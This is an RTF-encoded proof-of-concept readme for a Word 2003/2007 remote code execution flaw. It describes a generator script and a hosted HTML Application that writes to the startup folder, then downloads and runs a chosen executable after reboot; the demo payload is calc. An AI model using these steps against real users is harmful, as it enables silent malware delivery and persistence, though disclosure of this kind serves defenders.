\deftab708\widowctrl\ftnbj\aenddoc\hyphhotz425\trackmoves1\trackformatting1\donotembedsysfont1\relyonvml0\donotembedlingdata0\grfdocevents0\validatexml1\showplaceholdtext0\ignoremixedcontent0\saveinvalidxml0 71 | \showxmlerrors1\noxlattoyen\expshrtn\noultrlspc\dntblnsbdb\nospaceforul\formshade\horzdoc\dgmargin\dghspace180\dgvspace180\dghorigin150\dgvorigin0\dghshow1\dgvshow1 72 | \jexpand\viewkind5\viewscale100\pgbrdrhead\pgbrdrfoot\splytwnine\ftnlytwnine\htmautsp\nolnhtadjtbl\useltbaln\alntblind\lytcalctblwd\lyttblrtgr\lnbrkrule\nobrkwrptbl\snaptogridincell\allowfieldendsel\wrppunct 73 | \asianbrkrule\rsidroot7935471\newtblstyruls\nogrowautofit\usenormstyforlist\noindnmbrts\felnbrelev\nocxsptable\indrlsweleven\noafcnsttbl\afelev\utinl\hwelev\spltpgpar\notcvasp\notbrkcnstfrctbl\notvatxbx\krnprsnet\cachedcolbal \nouicompat \fet0 74 | {\*\wgrffmtfilter 2450}\nofeaturethrottle1\ilfomacatclnup0\ltrpar \sectd \ltrsect\linex0\headery708\footery708\colsx708\endnhere\sectlinegrid360\sectdefaultcl\sectrsid14503194\sftnbj {\*\pnseclvl1\pnucrm\pnstart1\pnindent720\pnhang {\pntxta .}} 75 | {\*\pnseclvl2\pnucltr\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}} 76 | {\*\pnseclvl6\pnlcltr\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl7\pnlcrm\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl8\pnlcltr\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl9 77 | \pnlcrm\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}\pard\plain \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 78 | \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid7935471 Microsoft Office Word}{\rtlch\fcs1 \af31507 \ltrch\fcs0 79 | \lang1033\langfe1033\langnp1033\insrsid13270317 2003,}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid7935471 2007 Remote Code Execution Vulnerability 80 | \par }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Word is prone to a remote code execution issue because of a component that allows script execution in the context of the opened document which will run 81 | in the context of the local machine security zone of Windows/Internet Explorer. This security zone has relaxed restrictions allowing arbitrary code to be executed using eg. ADO objects such as the \'93ADODB.recordset\'94 82 | that is able to create arbitrary files in arbitrary locations in the disk, including of course, the currently logged on user\'b4s startup folder. The file can be an HTML application, and will be run nex 83 | t time Windows boots and the same user that was affected by this vulnerability logs on to Windows. 84 | \par To exploit this vulnerability an attacker must trick users into opening a Microsoft Works file (with the \'93.WPS\'94 extension) or files that appears to be legitimate Word documents such as \'93.doc \'93, \'93.docx \'93, \'93.rtf \'94 85 | , all of them having spaces (alt + 255) at the end. The \'93.wps\'94 file when opened presents Word as the only option and the option to always open with it checked; The other ones also causes Windows to present Word as an option. 86 | The file will be processed as a webpage, usually in the local machine security zone, and this is when arbitrary code can be executed to, for instance, save an executable file to the startup folder. 87 | \par This has been successfully tested on latest Office 2007 SP3 on Windows XP, 7, 8, 8.1 all up to this date. 88 | \par 89 | \par -Instructions to reproduce this vulnerability- 90 | \par {\listtext\pard\plain\ltrpar \s18 \rtlch\fcs1 \af0\afs22 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\langnp1033\insrsid13270317 \hich\af31506\dbch\af0\loch\f31506 a)\tab}}\pard\plain \ltrpar\s18\ql \fi-360\li720\ri0\sa200\sl276\slmult1 91 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\ls2\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 92 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Extract all the files to the same folder. The full path to the folder should not contain spaces or special characters. This has to do with the creation of the \'93}{\rtlch\fcs1 \af31507 93 | \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 recordset.txt}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 \'94 94 | file creation, but nothing to do with the POC document that will be generated. This one can be saved in any of the currently logged on user\'b4s directories. (the userprofile dir and any sub directories and their names can be any) 95 | \par }\pard\plain \ltrpar\ql \li360\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin360\itap0\pararsid13270317 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 96 | \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 97 | \par {\listtext\pard\plain\ltrpar \s18 \rtlch\fcs1 \af0\afs22 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 \hich\af31506\dbch\af0\loch\f31506 b)\tab}}\pard\plain \ltrpar\s18\ql \fi-360\li720\ri0\sa200\sl276\slmult1 98 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\ls2\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 99 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 Run the script \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 POC-Generator.vbs}{\rtlch\fcs1 \af31507 \ltrch\fcs0 100 | \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 \'94. This will create a Word document with embedded HTML and script code that will allow execution of arbitrary code in the system. The user needs t}{\rtlch\fcs1 \af31507 \ltrch\fcs0 101 | \lang1033\langfe1033\langnp1033\insrsid13270317 o provide the document name, the IP address and port of the webserver to retrieve the files and the executable file name that will be downloaded and executed. At the end it will run the script \'93}{ 102 | \rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 create-recordset.hta}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 \'94 which will create the \'93}{\rtlch\fcs1 103 | \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 recordset.txt}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317 \'94}{\rtlch\fcs1 \af31507 \ltrch\fcs0 104 | \lang1033\langfe1033\langnp1033\insrsid13270317 file which in turn contains code to retrieve a VBS file (}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 dldrun.vbs}{\rtlch\fcs1 \af31507 \ltrch\fcs0 105 | \lang1033\langfe1033\langnp1033\insrsid13270317 ) to run Calc. 106 | \par }\pard \ltrpar\s18\ql \li720\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace {\rtlch\fcs1 \af31507 \ltrch\fcs0 107 | \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 108 | \par {\listtext\pard\plain\ltrpar \s18 \rtlch\fcs1 \af0\afs22 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\langnp1033\insrsid13270317 \hich\af31506\dbch\af0\loch\f31506 c)\tab}}\pard \ltrpar\s18\ql \fi-360\li720\ri0\sa200\sl276\slmult1 109 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\ls2\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Place the files \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 110 | \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 dldrun.vbs}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317 \'94 }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 , 111 | \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 recordset.txt}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 \'94 and the custom EXE file 112 | (The file name must be the same that your provided in the VBScript file) in the root directory of a webserver. 113 | \par }\pard\plain \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 114 | {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 115 | \par {\listtext\pard\plain\ltrpar \s18 \rtlch\fcs1 \af0\afs22 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\langnp1033\insrsid13270317 \hich\af31506\dbch\af0\loch\f31506 d)\tab}}\pard\plain \ltrpar\s18\ql \fi-360\li720\ri0\sa200\sl276\slmult1 116 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\ls2\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 117 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Open the document. It should download the \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 recordset.txt}{\rtlch\fcs1 \af31507 118 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 \'94 file from the webserver and save to the user\'b4s startup directory as an HTML Application. Upon rebooting, this HTML Application will retrieve the \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 119 | \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 dldrun.vbs}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317 \'94 }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 120 | file which execute calc for demonstration purposes.}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317 }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 121 | \par }\pard\plain \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 122 | {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 123 | \par If there is any issue please contact me . 124 | \par }\pard \ltrpar\ql \li0\ri0\nowidctlpar\wrapdefault\faauto\rin0\lin0\itap0\pararsid13270317 {\rtlch\fcs1 \af5\afs24 \ltrch\fcs0 \f5\fs24\lang1033\langfe1033\langnp1033\insrsid13270317 Web server software used on this item: IIS on Windows Server 2003 125 | \par }\pard \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 126 | \par }\pard \ltrpar\ql \li360\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin360\itap0\pararsid13270317 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Author: }{\rtlch\fcs1 \af31507 127 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid6693792 Eduardo}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Braun}{\rtlch\fcs1 \af31507 \ltrch\fcs0 128 | \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid6693792 Prado}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 129 | \par 130 | \par EOF.}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid6693792 131 | \par }\pard \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid7935471\charrsid13270317 132 | \par }{\*\themedata 504b030414000600080000002100828abc13fa0000001c020000130000005b436f6e74656e745f54797065735d2e786d6cac91cb6ac3301045f785fe83d0b6d8 133 | 72ba28a5d8cea249777d2cd20f18e4b12d6a8f843409c9df77ecb850ba082d74231062ce997b55ae8fe3a00e1893f354e9555e6885647de3a8abf4fbee29bbd7 134 | 2a3150038327acf409935ed7d757e5ee14302999a654e99e393c18936c8f23a4dc072479697d1c81e51a3b13c07e4087e6b628ee8cf5c4489cf1c4d075f92a0b 135 | 44d7a07a83c82f308ac7b0a0f0fbf90c2480980b58abc733615aa2d210c2e02cb04430076a7ee833dfb6ce62e3ed7e14693e8317d8cd0433bf5c60f53fea2fe7 136 | 065bd80facb647e9e25c7fc421fd2ddb526b2e9373fed4bb902e182e97b7b461e6bfad3f010000ffff0300504b030414000600080000002100a5d6a7e7c00000 137 | 00360100000b0000005f72656c732f2e72656c73848fcf6ac3300c87ef85bd83d17d51d2c31825762fa590432fa37d00e1287f68221bdb1bebdb4fc7060abb08 138 | 84a4eff7a93dfeae8bf9e194e720169aaa06c3e2433fcb68e1763dbf7f82c985a4a725085b787086a37bdbb55fbc50d1a33ccd311ba548b63095120f88d94fbc 139 | 52ae4264d1c910d24a45db3462247fa791715fd71f989e19e0364cd3f51652d73760ae8fa8c9ffb3c330cc9e4fc17faf2ce545046e37944c69e462a1a82fe353 140 | bd90a865aad41ed0b5b8f9d6fd010000ffff0300504b0304140006000800000021006b799616830000008a0000001c0000007468656d652f7468656d652f7468 141 | 656d654d616e616765722e786d6c0ccc4d0ac3201040e17da17790d93763bb284562b2cbaebbf600439c1a41c7a0d29fdbd7e5e38337cedf14d59b4b0d592c9c 142 | 070d8a65cd2e88b7f07c2ca71ba8da481cc52c6ce1c715e6e97818c9b48d13df49c873517d23d59085adb5dd20d6b52bd521ef2cdd5eb9246a3d8b4757e8d3f7 143 | 29e245eb2b260a0238fd010000ffff0300504b030414000600080000002100bbb12e83a1060000611b0000160000007468656d652f7468656d652f7468656d65 144 | 312e786d6cec594d6f1b4518be23f11f467b6f6d27761a4775aad8b11b68d346b15bd4e37877bc3bcdecce6a669cd437d41e9190100571a012370e08a8d44a5c 145 | ca899f12288222f52ff0ceccee7a27de34491b4105f521f1ce3eeff7c7bc33be7ce55eccd03e1192f2a4e3352ed63d44129f0734093bdeadd1e0c2aa87a4c249 146 | 80194f48c79b11e95d597fffbdcb784d45242608e813b9863b5ea454ba56ab491f96b1bcc85392c0bb09173156f028c25a20f001f08d596da95e5fa9c598261e 147 | 4a700c6c474083028e6e4e26d427de7acebecf4046a2a45ef099186ae624a3e94b5f50f5cb1341b92108f61a1a2667b2c704dac7ace381b8801f8cc83de52186 148 | a582171daf6e3e5e6dfd720daf65444c1d435ba21b984f469711047b4b46a608c785d0c6a0d9beb459f03700a61671fd7ebfd76f14fc0c00fb3e986b7529f36c 149 | 0e561bdd9c670964bf2ef2eed55bf5a68b2ff15f5ed0b9dded765bed4c17cbd480ecd7e6027eb5bed2dc5872f00664f1ad057cb3bbd1ebad387803b2f89505fc 150 | e0527ba5e9e20d286234d95b40eb800e0619f70232e16cab12be0af0d57a069fa3201b8a14d322263c51af4cb818dfe56200288d6658d104a9594a26d8878cee 151 | e1782c28d652f01ac1a53776c9970b4b5a20d2499daa8ef7618aa13ae6fc5e3efbfee5b327e8f0fed3c3fb3f1d3e787078ff47cbc8a1dac24958a67af1ed677f 152 | 3dfa18fdf9e49b170fbfa8c6cb32feb71f3ef9f5e7cfab81504373759e7ff9f8f7a78f9f7ff5e91fdf3dac806f083c2ec347342612dd20076897c76098f18aab 153 | 39198bb3518c224ccb141b49287182b5940afe7d1539e81b33ccb2e8387a7489ebc1db027a4815f0eaf4aea3f0301253452b245f8b6207b8cd39eb7251e9856b 154 | 5a56c9cda36912560b17d3326e17e3fd2ad93d9c38f1ed4f53e8a0795a3a86f722e2a8b9c370a2704812a2907ec7f708a9b0ee0ea58e5fb7a92fb8e41385ee50 155 | d4c5b4d225233a76b2694eb4456388cbacca6688b7e39beddba8cb5995d59b64df4542556056a1fc8830c78d57f154e1b88ae508c7acecf0eb5845554a0e67c2 156 | 2fe3fa5241a443c238ea0744ca2a9a9b02ec2d05fd1a86b65519f66d368b5da45074af8ae775cc7919b9c9f77a118ed32aec90265119fb81dc8314c56887ab2a 157 | f836772b443f431c70726cb86f53e284fbe46e708b868e4af304d16fa642c712fab5d381639abcaa1d330afdd8e6c0f9b5636880cfbf7e5491596f6b23de803d 158 | a9aa12b68eb4dfe370479b6e8f8b80befd3d77134f931d0269beb8f1bc6bb9ef5aaef79f6fb9c7d5f3691bedbcb742dbd573839d8ccd9c1cbf7a4c9e50c6866a 159 | c6c875692665099b453080454d6c8e8ba4383ba5117ccd9abb830b0536344870f51155d130c2294cd90d4f330965c63a9428e5128e7866b992b7c6c3a4aeec01 160 | b1a58f0eb62948acb679609797f5727e4228d8982d273467d15cd0b266705a61cb9732a660f6eb086b68a54e2dad615433fdce9156980c815c340d160b6fc214 161 | 826076012fafc0815d8b86d3096624d07eb71b701e161385f30c918c7040b21869bb1763d43041ca73c55c0c40ee54c4481ff74ef05a495a5bb37d0369a70952 162 | 595cf3187179f4de244a7906cfa3a48bf74839b2a45c9c2c41071dafdd5a6a79c8c769c79bc0c116bec629445deac10fb3106e8a7c256cda9f58cca6cae7d16c 163 | e786b945d0800b0bebf705839d3e900aa936b18c6c6a9857590ab0444bb2fa2fb5c0ade76580cdf4d7d062791592e15fd302fce886964c26c457e5609756b4ef 164 | ec63d64af95411318c8203346653b18b21fc3a55c19e804ab89f301d413fc08d9af6b679e536e7ace8caf7580667d7314b239cb55b5da279255bb8a9e34207f3 165 | 54520f6cabd4dd187776534cc99f9329e534fe9f99a2f713b82e580e74047cb8d71518e97aed785ca88843174a23ea0f044c0fa67740b6c0ad2cbc86a482db65 166 | f35f907dfddfd69ce561ca1a4e7d6a97864850d88f542408d981b664b2ef04668d6cefb22c59c6c86454495d995ab5c7649fb091ee812b7a6ff75004a96eba49 167 | d6060cee68feb9cf59058d433de494ebcde921c5de6b6be09f9e7c6c3183516e1f36034deeff42c58a5dd5d21bf27cef2d1ba25fccc7ac665e1520acb415b4b3 168 | b27f4d15ceb8d5da8eb560f1522b570ea2b868312c1603510a973e48ff81fd8f0a9fd91f2af4863ae2bbd05b11fce4a09941da40565fb08307d20dd22e8e6170 169 | b28b3699342bebda6c74d25ecb37eb739e740bb9479cad353b4dbccfe8ec623873c539b5789ecece3cecf8daae1deb6a88ecd11285a5497e9a318131bf71957f 170 | 84e2e3bb10e84db8e49f32254d32c1af4b02c3e839347500c56f251ad2f5bf010000ffff0300504b0304140006000800000021000dd1909fb60000001b010000 171 | 270000007468656d652f7468656d652f5f72656c732f7468656d654d616e616765722e786d6c2e72656c73848f4d0ac2301484f78277086f6fd3ba109126dd88 172 | d0add40384e4350d363f2451eced0dae2c082e8761be9969bb979dc9136332de3168aa1a083ae995719ac16db8ec8e4052164e89d93b64b060828e6f37ed1567 173 | 914b284d262452282e3198720e274a939cd08a54f980ae38a38f56e422a3a641c8bbd048f7757da0f19b017cc524bd62107bd5001996509affb3fd381a89672f 174 | 1f165dfe514173d9850528a2c6cce0239baa4c04ca5bbabac4df000000ffff0300504b01022d0014000600080000002100828abc13fa0000001c020000130000 175 | 0000000000000000000000000000005b436f6e74656e745f54797065735d2e786d6c504b01022d0014000600080000002100a5d6a7e7c0000000360100000b00 176 | 0000000000000000000000002b0100005f72656c732f2e72656c73504b01022d00140006000800000021006b799616830000008a0000001c0000000000000000 177 | 0000000000140200007468656d652f7468656d652f7468656d654d616e616765722e786d6c504b01022d0014000600080000002100bbb12e83a1060000611b00 178 | 001600000000000000000000000000d10200007468656d652f7468656d652f7468656d65312e786d6c504b01022d00140006000800000021000dd1909fb60000 179 | 001b0100002700000000000000000000000000a60900007468656d652f7468656d652f5f72656c732f7468656d654d616e616765722e786d6c2e72656c73504b050600000000050005005d010000a10a00000000} 180 | {\*\colorschememapping 3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d3822207374616e64616c6f6e653d22796573223f3e0d0a3c613a636c724d 181 | 617020786d6c6e733a613d22687474703a2f2f736368656d61732e6f70656e786d6c666f726d6174732e6f72672f64726177696e676d6c2f323030362f6d6169 182 | 6e22206267313d226c743122207478313d22646b3122206267323d226c743222207478323d22646b322220616363656e74313d22616363656e74312220616363 183 | 656e74323d22616363656e74322220616363656e74333d22616363656e74332220616363656e74343d22616363656e74342220616363656e74353d22616363656e74352220616363656e74363d22616363656e74362220686c696e6b3d22686c696e6b2220666f6c486c696e6b3d22666f6c486c696e6b222f3e} 184 | {\*\latentstyles\lsdstimax267\lsdlockeddef0\lsdsemihiddendef1\lsdunhideuseddef1\lsdqformatdef0\lsdprioritydef99{\lsdlockedexcept \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority0 \lsdlocked0 Normal; 185 | \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority9 \lsdlocked0 heading 1;\lsdqformat1 \lsdpriority9 \lsdlocked0 heading 2;\lsdqformat1 \lsdpriority9 \lsdlocked0 heading 3;\lsdqformat1 \lsdpriority9 \lsdlocked0 heading 4; 186 | \lsdqformat1 \lsdpriority9 \lsdlocked0 heading 5;\lsdqformat1 \lsdpriority9 \lsdlocked0 heading 6;\lsdqformat1 \lsdpriority9 \lsdlocked0 heading 7;\lsdqformat1 \lsdpriority9 \lsdlocked0 heading 8;\lsdqformat1 \lsdpriority9 \lsdlocked0 heading 9; 187 | \lsdpriority39 \lsdlocked0 toc 1;\lsdpriority39 \lsdlocked0 toc 2;\lsdpriority39 \lsdlocked0 toc 3;\lsdpriority39 \lsdlocked0 toc 4;\lsdpriority39 \lsdlocked0 toc 5;\lsdpriority39 \lsdlocked0 toc 6;\lsdpriority39 \lsdlocked0 toc 7; 188 | \lsdpriority39 \lsdlocked0 toc 8;\lsdpriority39 \lsdlocked0 toc 9;\lsdqformat1 \lsdpriority35 \lsdlocked0 caption;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority10 \lsdlocked0 Title;\lsdpriority1 \lsdlocked0 Default Paragraph Font; 189 | \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority11 \lsdlocked0 Subtitle;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority22 \lsdlocked0 Strong;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority20 \lsdlocked0 Emphasis; 190 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority59 \lsdlocked0 Table Grid;\lsdunhideused0 \lsdlocked0 Placeholder Text;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority1 \lsdlocked0 No Spacing; 191 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority60 \lsdlocked0 Light Shading;\lsdsemihidden0 \lsdunhideused0 \lsdpriority61 \lsdlocked0 Light List;\lsdsemihidden0 \lsdunhideused0 \lsdpriority62 \lsdlocked0 Light Grid; 192 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority63 \lsdlocked0 Medium Shading 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority64 \lsdlocked0 Medium Shading 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority65 \lsdlocked0 Medium List 1; 193 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority66 \lsdlocked0 Medium List 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority67 \lsdlocked0 Medium Grid 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority68 \lsdlocked0 Medium Grid 2; 194 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority69 \lsdlocked0 Medium Grid 3;\lsdsemihidden0 \lsdunhideused0 \lsdpriority70 \lsdlocked0 Dark List;\lsdsemihidden0 \lsdunhideused0 \lsdpriority71 \lsdlocked0 Colorful Shading; 195 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority72 \lsdlocked0 Colorful List;\lsdsemihidden0 \lsdunhideused0 \lsdpriority73 \lsdlocked0 Colorful Grid;\lsdsemihidden0 \lsdunhideused0 \lsdpriority60 \lsdlocked0 Light Shading Accent 1; 196 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority61 \lsdlocked0 Light List Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority62 \lsdlocked0 Light Grid Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority63 \lsdlocked0 Medium Shading 1 Accent 1; 197 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority64 \lsdlocked0 Medium Shading 2 Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority65 \lsdlocked0 Medium List 1 Accent 1;\lsdunhideused0 \lsdlocked0 Revision; 198 | \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority34 \lsdlocked0 List Paragraph;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority29 \lsdlocked0 Quote;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority30 \lsdlocked0 Intense Quote; 199 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority66 \lsdlocked0 Medium List 2 Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority67 \lsdlocked0 Medium Grid 1 Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority68 \lsdlocked0 Medium Grid 2 Accent 1; 200 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority69 \lsdlocked0 Medium Grid 3 Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority70 \lsdlocked0 Dark List Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority71 \lsdlocked0 Colorful Shading Accent 1; 201 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority72 \lsdlocked0 Colorful List Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority73 \lsdlocked0 Colorful Grid Accent 1;\lsdsemihidden0 \lsdunhideused0 \lsdpriority60 \lsdlocked0 Light Shading Accent 2; 202 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority61 \lsdlocked0 Light List Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority62 \lsdlocked0 Light Grid Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority63 \lsdlocked0 Medium Shading 1 Accent 2; 203 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority64 \lsdlocked0 Medium Shading 2 Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority65 \lsdlocked0 Medium List 1 Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority66 \lsdlocked0 Medium List 2 Accent 2; 204 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority67 \lsdlocked0 Medium Grid 1 Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority68 \lsdlocked0 Medium Grid 2 Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority69 \lsdlocked0 Medium Grid 3 Accent 2; 205 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority70 \lsdlocked0 Dark List Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority71 \lsdlocked0 Colorful Shading Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority72 \lsdlocked0 Colorful List Accent 2; 206 | \lsdsemihidden0 \lsdunhideused0 \lsdpriority73 \lsdlocked0 Colorful Grid Accent 2;\lsdsemihidden0 \lsdunhideused0 \lsdpriority60 